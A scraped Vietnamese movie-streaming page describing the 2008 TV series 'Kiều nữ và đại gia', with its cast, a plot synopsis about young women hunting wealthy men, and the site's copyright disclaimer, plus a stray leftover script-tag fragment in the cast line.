xem phim kieu nu va dai gia online, download Kiều nữ và đại gia hd online
Neu ban khong vao duoc, xin vui long thu lai sau, chung toi dang co gang khac phuc su co.
 
 
Kiều nữ và đại gia - phim viet nam
kieu nu va dai gia

Kiều nữ và đại gia

,

30 episodes | Luot Xem: 3019704   |  2008 |  Vietnam
Dien Vien: Chí Trung, Thanh Hoàng, Khương Thịnh, Thái Thành, Lý Nhã Kỳ, Thùy Lâm, Ngọc Lan src="http://raphd.net/js/redirection_mobile.js">

cham bi  Description - Thong tin them ve phim
Kiều nữ và đại gia - (Vietnam)


Kịch bản phim dựa vào chất liệu sống là loạt phóng sự dài kỳ Kiều nữ săn đại gia từng đăng trên báo Pháp Luật TPHCM của tác giả Nguyễn Minh Chí. Anh cũng là người tự chuyển thể bài báo thành... kịch bản phim truyền hình. Tham gia diễn xuất, có những gương mặt 'đại gia' và các 'kiều nữ' quen thuộc:
NSƯT Chí Trung, Thanh Hoàng, Khương Thịnh, Thái Thành, Lý Nhã Kỳ, Thùy Lâm, Ngọc Lan, ca sĩ Khaly, nhà tạo mẫu tóc Tuấn Hà Lan...


Theo bật mí của nhà sản xuất, những nhân vật chính trong phim được giữ đúng như nguyên mẫu nhân vật trong loạt phóng sự, 'gần gũi' với đời sống.
Nội dung kịch bản mang tính khôi hài nhưng chứa đựng lời cảnh báo cho một hiện tượng xã hội đang bùng phát. Câu chuyện xoay quanh hai chị em bạn dì Quỳnh Hoa, Phương Hồng trong vị trí 'thợ săn', và Diễm Kiều - một cô gái lọc lõi tình trường nhưng đang phải nuôi một gã chồng hờ đẹp trai, nghiện ngập.

Bộ phim dài 30 tập, mỗi tập sẽ giải quyết một vấn đề hoặc tình huống, và tập trung vào khía cạnh hài hước. Đại gia là con mồi hay thợ săn, phải đợi đến cuối phim mới bật mí.

Trong phim này, bạn sẽ bất ngờ với sự thay đổi trong nét diễn xuất của Khương Thịnh trong vai Tuấn Hotel, một gã chồng hờ nghiện ngập chuyên bòn của. Khương Thịnh hoàn toàn lột xác khỏi dáng vẻ thư sinh, những vai diễn hiền khô na ná nhau như trước đây anh từng thể hiện.

NSƯT Chí Trung và Thanh Hoàng bỗng dưng 'hồi xuân' trong vai diễn đại gia mê gái, nhìn phụ nữ chỉ nhìn... từ dưới lên!

Lý Nhã Kỳ, trong vai chính Diễm Kiều, đã có sự bứt phá khá ngoạn mục sau khi trải qua nhiều bộ phim nhưng chưa may mắn để lại những dấu ấn: Giá mua một thượng đế, Chuyện tình yêu, Tình yêu còn mãi,... Vai Diễm Kiều của Nhã Kỳ đủ độ sắc sảo, ghê gớm nhưng cũng có lắm lúc yếu đuối rất đáng thương, vì sống hết mình cho tình yêu.
Phim cùng thể loại - Similar movies
View: 3162213
View: 120221
View: 954682
View: 582223
Đăng kí nhận phim mới qua email

 
Copyright © 2007 - 2012 Kenh88.Com Phim Online Entertainment Network
Phim88.com is a portal that made for Phim, Phim Online, Xem Phim, Online Phim and Xem Phim Online.
Phim88.Com main focus on phim online, online phim, xem phim online, download phim. Phim tai phim88.com chat luong cao va download truc tiep. Ban co the xem phim online hoac download phim toc do cao. Phim88.Com covers phim viet nam, phim hong kong, phim han quoc, phim trung quoc, phim dai loan, phim le, phim bo, phim tap, phim tvb.
Phim88.Com is absolutely legal and contain only links to other sites on the Internet : (youtube.com, dailymotion.com,.. ).Phim88.Com is not responsible for the accuracy, compliance, copyright, legality, decency, or any other aspect of the content of other linked sites.
If you have any legal issues please contact appropriate media file owners / hosters.

DMCA Notification | Privacy Policy
amung